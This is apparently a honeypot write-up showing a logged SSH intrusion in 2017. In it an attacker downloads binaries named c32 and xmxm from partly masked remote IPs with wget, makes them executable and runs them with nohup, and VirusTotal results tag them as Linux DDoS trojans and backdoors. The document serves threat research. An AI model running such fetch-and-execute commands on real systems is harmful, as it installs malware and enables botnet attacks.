Our ssh honeypot recorded a fresh ssh attack and here is the log:
[0x0000655b],[0x00007f2079700780],[info],[0],session username:xxxxxxx password:xxxxxxx[0x0000655b],[0x00007f2079700780],[notification],[1],login successful
[0x0000655b],[0x00007f2079700780],[notification],[2],log name /opt/Debug/xxxx.log
[0x0000655b],[0x00007f2079700780],[notification],[3],Opened Shell
[0x0000655b],[0x00007f2079700780],[info],[4],$
[0x0000655b],[0x00007f2079700780],[info],[5],stdin write
[0x0000655b],[0x00007f2079700780],[info],[6],wget http://xxx.xxx.248.189:281/c32
[0x0000655b],[0x00007f2079700780],[info],[7],wget http://xxx.xxx.248.189:281/c32
[0x0000655b],[0x00007f2079700780],[info],[8],–2017-02-12 15:48:27– http://xxx.xxx.248.189:281/c32
[0x0000655b],[0x00007f2079700780],[info],[9],
正在连接 xxx.xxx.248.189:281…
[0x0000655b],[0x00007f2079700780],[info],[10],stdin write
[0x0000655b],[0x00007f2079700780],[info],[11],chmod 777 c32
[0x0000655b],[0x00007f2079700780],[info],[12],chmod 777 c32
[0x0000655b],[0x00007f2079700780],[info],[13],stdin write
[0x0000655b],[0x00007f2079700780],[info],[14],chmod +x c32
[0x0000655b],[0x00007f2079700780],[info],[15],chmod +x c32
[0x0000655b],[0x00007f2079700780],[info],[16],stdin write
[0x0000655b],[0x00007f2079700780],[info],[17],nohup ./c32 &
[0x0000655b],[0x00007f2079700780],[info],[18],nohup ./c32 &
[0x0000655b],[0x00007f2079700780],[info],[19],stdin write
[0x0000655b],[0x00007f2079700780],[info],[20],./c32 &
[0x0000655b],[0x00007f2079700780],[info],[21],./c32 &
[0x0000655b],[0x00007f2079700780],[info],[22],stdin write
[0x0000655b],[0x00007f2079700780],[info],[23],cd /tmp
[0x0000655b],[0x00007f2079700780],[info],[24],cd /tmp
[0x0000655b],[0x00007f2079700780],[info],[25],stdin write
[0x0000655b],[0x00007f2079700780],[info],[26],wget http://xxx.xxx.248.71:2/xmxm
[0x0000655b],[0x00007f2079700780],[info],[27],wget http://xxx.xxx.248.71:2/xmxm
[0x0000655b],[0x00007f2079700780],[info],[28],stdin write
[0x0000655b],[0x00007f2079700780],[info],[29],chmod 777 xmxm
[0x0000655b],[0x00007f2079700780],[info],[30],chmod 777 xmxm
[0x0000655b],[0x00007f2079700780],[info],[31],stdin write
[0x0000655b],[0x00007f2079700780],[info],[32],nohup xmxm &
[0x0000655b],[0x00007f2079700780],[info],[33],nohup xmxm &
[0x0000655b],[0x00007f2079700780],[info],[34],stdin write
[0x0000655b],[0x00007f2079700780],[info],[35],./xmxm &
[0x0000655b],[0x00007f2079700780],[info],[36],./xmxm &
The two new samples:
The file c32 is new to virustotal and here is the link:
https://www.virustotal.com/en/file/7939736761004fcfd0210cce4b8a24a84b3b72b3f223af0643a0f1b75cf3da75/analysis/
| SHA256: | 7939736761004fcfd0210cce4b8a24a84b3b72b3f223af0643a0f1b75cf3da75 |
| File name: | c32 |
| Detection ratio: | 6 / 54 |
| Analysis date: | 2017-02-12 15:21:14 UTC ( 49 minutes ago ) |
| Antivirus | Result | Update |
|---|---|---|
| AVG | Linux/ChinaZ | 20170212 |
| AegisLab | Troj.Ddos.Linux!c | 20170212 |
| Avira (no cloud) | LINUX/DnsAmp.zifrw | 20170212 |
| ESET-NOD32 | a variant of Linux/Dnsamp.J | 20170212 |
| Kaspersky | HEUR:Trojan-DDoS.Linux.Kluh.a | 20170212 |
| Qihoo-360 | Win32/Trojan.DDoS.526 | 20170212 |
The file xmxm is also new to virustotal and here is the link:
https://www.virustotal.com/en/file/b28813d81653831faf5b046ccb1a4ff87528586ecf3a2424c03871e47bf9b824/analysis/
| SHA256: | b28813d81653831faf5b046ccb1a4ff87528586ecf3a2424c03871e47bf9b824 |
| Detection ratio: | 32 / 55 |
| Analysis date: | 2017-02-11 20:05:04 UTC ( 20 hours, 9 minutes ago ) |
| Antivirus | Result | Update |
|---|---|---|
| ALYac | Trojan.Agent.Linux.A | 20170211 |
| AVG | Linux/BackDoor_c.CL | 20170211 |
| Ad-Aware | Trojan.Agent.Linux.A | 20170211 |
| AhnLab-V3 | Linux/Backdoor.1223123.B | 20170211 |
| Antiy-AVL | Trojan[Backdoor]/Linux.Ganiw.a | 20170211 |
| Arcabit | Trojan.Agent.Linux.A | 20170211 |
| Avast | ELF:Elknot-AE [Trj] | 20170211 |
| Avira (no cloud) | LINUX/Setag.kzmdl | 20170211 |
| BitDefender | Trojan.Agent.Linux.A | 20170211 |
| CAT-QuickHeal | Backdoor.Linux.Setag.E | 20170211 |
| ClamAV | Unix.Trojan.Agent-37008 | 20170211 |
| DrWeb | Linux.BackDoor.Gates.9 | 20170211 |
| ESET-NOD32 | Linux/Setag.B.Gen | 20170211 |
| Emsisoft | Trojan.Agent.Linux.A (B) | 20170211 |
| F-Secure | Trojan.Agent.Linux.A | 20170211 |
| Fortinet | ELF/Ganiw.A!tr | 20170211 |
| GData | Trojan.Agent.Linux.A | 20170211 |
| Ikarus | Trojan.Linux.Setag | 20170211 |
| Jiangmin | Backdoor/Linux.io | 20170211 |
| Kaspersky | HEUR:Backdoor.Linux.Ganiw.d | 20170211 |
| McAfee | Linux/Gates | 20170211 |
| McAfee-GW-Edition | Linux/Gates | 20170211 |
| eScan | Trojan.Agent.Linux.A | 20170211 |
| Microsoft | Backdoor:Linux/Setag!rfn | 20170211 |
| NANO-Antivirus | Trojan.Unix.Ganiw.ditcrf | 20170210 |
| Qihoo-360 | virus.elf.ddos.f | 20170211 |
| Rising | Backdoor.Setag/Linux!1.A3E5 (classic) | 20170211 |
| Sophos | Linux/DDoS-BD | 20170211 |
| Symantec | Linux.Chikdos.B!gen2 | 20170211 |
| TrendMicro | ELF_SETAG.SM | 20170211 |
| TrendMicro-HouseCall | ELF_SETAG.SM | 20170211 |
| Zillya | Trojan.Agent.Linux.12 | 20170210 |
